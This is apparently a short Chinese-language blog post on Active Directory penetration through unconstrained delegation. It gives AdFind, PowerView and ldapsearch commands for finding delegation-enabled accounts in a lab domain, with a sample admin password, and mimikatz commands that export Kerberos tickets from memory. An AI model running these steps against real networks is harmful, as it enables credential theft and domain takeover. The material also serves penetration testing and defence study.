⾮约束委派(Unconstrained delegation) 约束委派(Constrained Delegation) 基于资 源的约束委派(Resource Based Constrained Delegation)
AdFind [switches] [-b basedn] [-f filter] [attr list]
AdFind.exe -b "DC=testdc,DC=com" -f "(&(samAccountType=805306368)
(userAccountControl:1.2.840.113556.1.4.803:=524288))" cndistinguishedName
AdFind.exe -b "DC=testdc,DC=com" -f "(&(samAccountType=805306369)
(userAccountControl:1.2.840.113556.1.4.803:=524288))" cndistinguishedName
Import-Module ./PowerView.ps1;
Get-NetUser -Unconstrained -Domain testdc.com | select name
Get-NetComputer -Unconstrained -Domain testdc.com | select nam
ldapsearch -x -H ldap://10.10.10.5:389 -D "CN=administrator,CN=Users,DC=testdc,DC=com" -w admin!@45 -b"DC=testdc,DC=com" "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" | grep -iE "distinguishedName"
ldapsearch -x -H ldap://10.10.10.5:389 -D "CN=administrator,CN=Users,DC=testdc,DC=com" -w admin!@45 -b"DC=testdc,DC=com" "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" | grep -iE "distinguishedName"
mimikatz提取凭据
privilege::debug;
sekurlsa::tickets /export;
原文始发于微信公众号(XG小刚):域渗透-非约束委派
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论